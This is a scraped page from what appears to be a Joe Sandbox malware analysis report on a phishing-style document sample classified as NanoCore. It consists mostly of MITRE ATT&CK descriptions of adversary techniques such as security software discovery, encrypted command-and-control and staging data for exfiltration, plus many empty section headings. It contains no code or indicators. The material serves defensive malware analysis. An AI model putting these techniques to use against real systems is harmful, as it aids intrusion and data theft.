Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report NEW ORDER Ref PO-298721.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

Exploits:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre